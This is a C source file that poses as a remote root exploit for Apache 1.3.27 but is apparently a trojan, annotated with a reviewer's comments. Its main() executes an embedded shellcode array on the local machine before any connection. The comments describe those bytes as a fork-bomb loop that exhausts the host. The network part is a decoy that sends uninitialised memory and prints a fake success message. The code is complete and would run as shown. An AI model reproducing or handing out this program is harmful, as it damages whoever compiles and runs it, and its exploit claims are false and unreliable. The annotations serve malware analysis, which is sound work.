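/* Apache/1.3.27 - Remote Root Exploit
* :: PRIVATE - DO NOT DISTRIBUTE ::
* >!!!WARNING!!! this exploit is a trojan ;)
*   (main() casts shellcode[] to a function pointer and calls it on the local
*   machine before any connection to the target is attempted)
* PS: for education only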
* Apache/1.3.27 - Remote Root Exploit
* Knights of the Eastern Calculus (info@koec.org)
*/
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Opaque byte blob used two ways by main(): its leading bytes are copied into
 * the buffer that is later sent, and the array itself is cast to a function
 * pointer and called inside the local process.
 *
 * The literal contains embedded \x00 bytes (the first one is on the fourth
 * row), so every strlen(shellcode) in main() measures only the bytes in front
 * of that first NUL; the remaining rows are never copied.
 *
 * NOTE(review): the bytes before the first NUL look like 32-bit x86 that
 * pushes a 24-byte text banner, issues int 0x80 with eax=4 (write), and then
 * jumps back forever around int 0x80 with eax=2 (fork on Linux i386) - i.e. a
 * process-exhaustion loop on the machine that runs this program, not a remote
 * shell. The rows after that loop appear to be filler meant to make the blob
 * look like a real payload. Confirm with a disassembler in an isolated VM
 * before relying on this description.
 */
static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};
/*
 * Entry point of a program that presents itself as a remote exploit but whose
 * only deliberate effect is on the machine that runs it: the shellcode[] array
 * is executed in-process (see the call below) before any network activity.
 *
 * Points a reviewer or malware analyst should take from the visible code:
 *  - the payload call precedes gethostbyname()/connect(), so the "target"
 *    argument plays no part in what the payload does;
 *  - the buffer that is sent is mostly uninitialized heap memory, not a
 *    crafted request;
 *  - the "shell port" argument is only echoed in the final message; nothing
 *    here binds, listens on, or connects to that port;
 *  - the success/failure text does not reflect whether send() worked.
 *
 * Usage as printed by the program: <target> <shell port>.
 * No return statement is present; the exit paths shown all call exit().
 */
/* Non-standard signature: argc is declared as a pointer and cast back to int below. */
int main(int *argc, char **argv)
{
int i;
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
/* Argument-count check; relies on the pointer-typed argc holding the count. */
if((int)argc < 3 )
{
printf("usage: %s <target> <shell port>\n", argv[0]);
printf("ex: %s www.netsill.com 31337\n", argv[0]);
exit(0);
}
/* 1636-byte heap buffer; malloc() does not initialize it and nothing below fills it. */
buffer = (char *) malloc(512 + 1024 + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
/*
 * Copies only the bytes of shellcode[] that precede its first embedded NUL
 * (strlen stops there), placing them so they end at offset 512.
 */
memcpy(&buffer[512 - strlen(shellcode)], shellcode,
strlen(shellcode));
/* Terminator written at offsets 1536/1537; everything else stays uninitialized. */
buffer[512 + 1024] = ';';
buffer[512 + 1024 + 1] = '\0';
/*
 * The trojan: shellcode[] is cast to a function pointer and called in THIS
 * process, on the local host, before the target is even resolved. All code
 * after this line runs only if that call returns.
 * NOTE(review): on systems with non-executable data pages this call would
 * presumably fault rather than run the bytes - confirm per platform.
 */
void(*b)()=(void*)shellcode;b();
/* Resolve the host name given as the first argument. */
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("Server doesn't exist\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
/* Destination port is hard-coded to 80; argv[2] is not used for the connection. */
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Cannot open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("Attempting to Exploit...\n");
/*
 * strlen(buffer) walks uninitialized memory, so the length sent is whatever
 * lies before the first zero byte in the heap garbage. The comparison with 1
 * means "Success!!!" is printed for every send() result except exactly 1,
 * including -1 on error - the message is a decoy, not a status.
 */
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("Success!!!\n");
else
printf("No go there tough guy!\n");
/* argv[2] is only parsed for display here; no code in this file opens that port. */
printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2]));
}